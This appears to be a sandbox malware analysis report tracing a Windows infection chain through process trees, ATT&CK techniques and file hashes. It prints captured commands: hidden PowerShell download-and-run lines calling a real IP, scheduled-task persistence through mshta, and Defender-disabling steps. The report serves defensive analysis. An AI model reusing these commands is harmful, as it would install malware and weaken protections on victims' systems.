C:\Users\Admin\AppData\Local\Temp\random.exe"C:\Users\Admin\AppData\Local\Temp\random.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2612 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn irgmpmaPjxx /tr "mshta C:\Users\Admin\AppData\Local\Temp\1CLL2Auvw.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1160 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn irgmpmaPjxx /tr "mshta C:\Users\Admin\AppData\Local\Temp\1CLL2Auvw.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2264
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\1CLL2Auvw.hta2⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2904 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BNGAMKJCNIPEIJTDIPVHVWPM6JQ2P5R5.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3008 -
C:\Users\Admin\AppData\Local\TempBNGAMKJCNIPEIJTDIPVHVWPM6JQ2P5R5.EXE"C:\Users\Admin\AppData\Local\TempBNGAMKJCNIPEIJTDIPVHVWPM6JQ2P5R5.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2336 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1244 -
C:\Users\Admin\AppData\Local\Temp\1069394001\tP5086S.exe"C:\Users\Admin\AppData\Local\Temp\1069394001\tP5086S.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3036 -
C:\Users\Admin\AppData\Local\Temp\1069394001\tP5086S.exe"C:\Users\Admin\AppData\Local\Temp\1069394001\tP5086S.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3048
-
-
-
C:\Users\Admin\AppData\Local\Temp\1069896101\f6ab01a3eb.exe"C:\Users\Admin\AppData\Local\Temp\1069896101\f6ab01a3eb.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1596 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn sgH9AmaKYtX /tr "mshta C:\Users\Admin\AppData\Local\Temp\R5GXd9ApC.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn sgH9AmaKYtX /tr "mshta C:\Users\Admin\AppData\Local\Temp\R5GXd9ApC.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2316
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\R5GXd9ApC.hta7⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1508 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'CFW4QF6ENU2PL91EKUJZLGKR3QLVHYPT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3068 -
C:\Users\Admin\AppData\Local\TempCFW4QF6ENU2PL91EKUJZLGKR3QLVHYPT.EXE"C:\Users\Admin\AppData\Local\TempCFW4QF6ENU2PL91EKUJZLGKR3QLVHYPT.EXE"9⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2368
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\1069897021\am_no.cmd" "6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1944 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1069897021\am_no.cmd" any_word7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2576 -
C:\Windows\SysWOW64\timeout.exetimeout /t 28⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2704
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- System Location Discovery: System Language Discovery
PID:2544 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2560
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- System Location Discovery: System Language Discovery
PID:2336 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1800
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵
- System Location Discovery: System Language Discovery
PID:2252 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1600
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "VW8N9manL6T" /tr "mshta \"C:\Temp\OFt1VWxJf.hta\"" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1568
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\OFt1VWxJf.hta"8⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:1772 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;9⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:640 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"10⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1532
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1069932001\uniq.exe"C:\Users\Admin\AppData\Local\Temp\1069932001\uniq.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2220 -
C:\Users\Admin\AppData\Local\Temp\1069932001\uniq.exe"C:\Users\Admin\AppData\Local\Temp\1069932001\uniq.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:1952
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 5167⤵
- Loads dropped DLL
- Program crash
PID:888
-
-
-
C:\Users\Admin\AppData\Local\Temp\1069951001\aa18cc5449.exe"C:\Users\Admin\AppData\Local\Temp\1069951001\aa18cc5449.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1716
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
5Disable or Modify Tools
5Modify Registry
8Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
782B
MD516d76e35baeb05bc069a12dce9da83f9
SHA1f419fd74265369666595c7ce7823ef75b40b2768
SHA256456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7
SHA5124063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e
-
Filesize
288KB
MD5d2c9f038ad8e26b5fe69a63672aaed38
SHA19cee53f629d049a7db1a8aa6e79a5d6ba7deca64
SHA256e073f5d5cca8d8de73e99dc44bb3390796b7da98da0f3005cf9529b3d398091e
SHA512e588e0982a692585670fac2eb721baa13d94a8c07214bf6f9cf8268f9bac52ed8b1f1b5439ecaceaab1174b1864de348683989fd24dfb2174ea09e438e1dcca2
-
Filesize
8.4MB
MD556430177218bce2f16a83c2c96fd3a8d
SHA11a00572c02e92250008b7de1dff022e5d56fcd13
SHA256afaba79ce39d805aee7b5faa9204fb7fd640ca0860aeca5bccda20c30d7018a7
SHA5126c70665e6eac892f2f2a15d86e9e1fdb332d495d0f5e9457497c6658dd842185b4881226b32ade17610d975e69c986fea68788b73907560ebb10086e41989d38
-
Filesize
938KB
MD535175480aaf58a493e68cb0adc722d8b
SHA12b59ac7beda4cab50a10b0ea9a787c33151cd723
SHA2562e5e065dd96bc73491747ef2163358f9d8dd21a09f828d3d83adc5cb9a5ddafd
SHA51218b54f47363bd68636b2bab867226dca0233bceada0c06cc32487a1adcf28dc6003490fe1fe77d2ad25a876a36f0c589d5597b13dd4d1a3182ab6cb68f91f29d
-
Filesize
2KB
MD5189e4eefd73896e80f64b8ef8f73fef0
SHA1efab18a8e2a33593049775958b05b95b0bb7d8e4
SHA256598651a10ff90d816292fba6e1a55cf9fb7bb717f3569b45f22a760849d24396
SHA512be0e6542d8d26284d738a33df3d574d9849d709d091d66588685a1ac30ed1ebef48a9cc9d8281d9aeebc70fed0ddae22750cd253ec6b89e78933de08b0a09b74
-
Filesize
797KB
MD5e268f769abd97e4e352d85e3308280fd
SHA151e3faf138065a9ed316e35ceb26fb0ac33894a4
SHA256e73e6f338d3d37c125ab21fcd8d78ae5453f8e7a8590d6084d978abb9ebf07cb
SHA51242f4e30f37fae7bd7923cbbe77bf1e6ed7e97c7ce8b280db59bd0ad911ac4692d5cd8868c012a8bea96c2e881b888a345b844d618a09f3e9a4939e9c5f719bec
-
Filesize
5.8MB
MD5984c4780f3443a5870fee13124382112
SHA1b1efa178ee3002c42def2ad27a014e5ebce86e17
SHA256d6a8314853b4ef689f1f4531f575af9e6335425fbede36bde7d7f15d445bb624
SHA5121d16aef6869b683cd962169f9f459b83f74d385ac6dbf983987a98a42d0ab8f6cbfbd782d1781de56a53e1a1cfe4a45f44d02b8e91b3feda97d58785bb0d6b86
-
Filesize
720B
MD5ed08ada9c8c69c5db97f4c16bc0a07e3
SHA1dcf61bf8411c23bd05564714b24dd5eea63f8a97
SHA25607135a3ace9b45a8c5b1b7098d28a11d3802185f99b0ea2a8952e26315c78d4b
SHA512d3e78da5baa60f24fbd5447a0b1aa7bedb5f61ee804b55868afa49b0b595aa9209211bc2d934b0b9d688f8fe1abf2e0a0e3038b713171a2641499699d63da0d9
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
726B
MD5ef0cf73d0c0ae274d7aa2a1d0b7ef9d7
SHA18045d70723666a3af484be0c4cfe557a1da1a0de
SHA2561dc596c544a9bfb8dc751184cdafececaf7032a99a800c9005f793650bfec9c9
SHA5128affbf728eb711c8a1f03676aeb23e40b7f445b59c6cb3fbd7d65257d5459707dc395b7bb067b76f73d2d2938d4a0d1b4d20a4ff9d08478913dc21f006b9ed64
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
6.6MB
MD53c388ce47c0d9117d2a50b3fa5ac981d
SHA1038484ff7460d03d1d36c23f0de4874cbaea2c48
SHA256c98ba3354a7d1f69bdca42560feec933ccba93afcc707391049a065e1079cddb
SHA512e529c5c1c028be01e44a156cd0e7cad0a24b5f91e5d34697fafc395b63e37780dc0fac8f4c5d075ad8fe4bd15d62a250b818ff3d4ead1e281530a4c7e3ce6d35
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4NLGEZ8EGHC34OUI9CNA.temp
Filesize7KB
MD557b6fa20b04d6fb1bbe0e4d17e930d52
SHA116ea8bafd06792020011bc3d3ff0bd26f0852a75
SHA2563cc79b7d00ca11b2a87d4933dc1409f5059e90678faa502f4d0862d4d91ee087
SHA512a35f7c278daa5af23709f9dbf46493114fe247e66f638d01b459b35d448506d9359d707cd7dda10b5e5d8cedf95b67a923505445e22aa08c3ce52c1c2cf54013
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD570c3e9ec34f67d97a63bc91426f0be5f
SHA116077dae5d1be9b4df7369d6dd3a591fe9499266
SHA2567d830cadda4ae6dbffb2f2fccc67b11e3ae7b2147b896a0c0030be5374a893eb
SHA512d6e402fe9cc6521e6936c36c89828cd048bcbed65c9f2c0cbf180bbadebf3beec9a7901b37c3291eb4144f0b849643c682ca25bb2b772f6494e4a36e7db97c73
-
Filesize
2.0MB
MD5783c3176e8a9c8efa3ff707b4da43ca8
SHA1e8dc38e41a14132f3b572a53e9a202332911f93a
SHA2564061df94f07e503168308145f507626c14df1e13fe1d6de9901bccb746224cd6
SHA512bb9ef7b5a5c17bd65b15700808fae8f20f75d50714107335b2c3fec1f52e3474c480b085965f5bba9456c0164956f836aba5869aa48108bb6d8a907ea6bfb63f
-
Filesize
2.7MB
MD5ea88f12c71ca738e6f60e6043009d593
SHA1013daac987414de9ba077911bd465b48353253f0
SHA256ec3a6e29f92fc7c90481d585229ed6a4ce28f0e97003b86439fbe3c53c1ada51
SHA512f493c6a0ab0a1e7d8ffb071a241cc2113d312cd02064a590939cda4b8e82379142806caead7cd13f8d37b716f31f80466a8e96a523376f6743e10c87450b61e7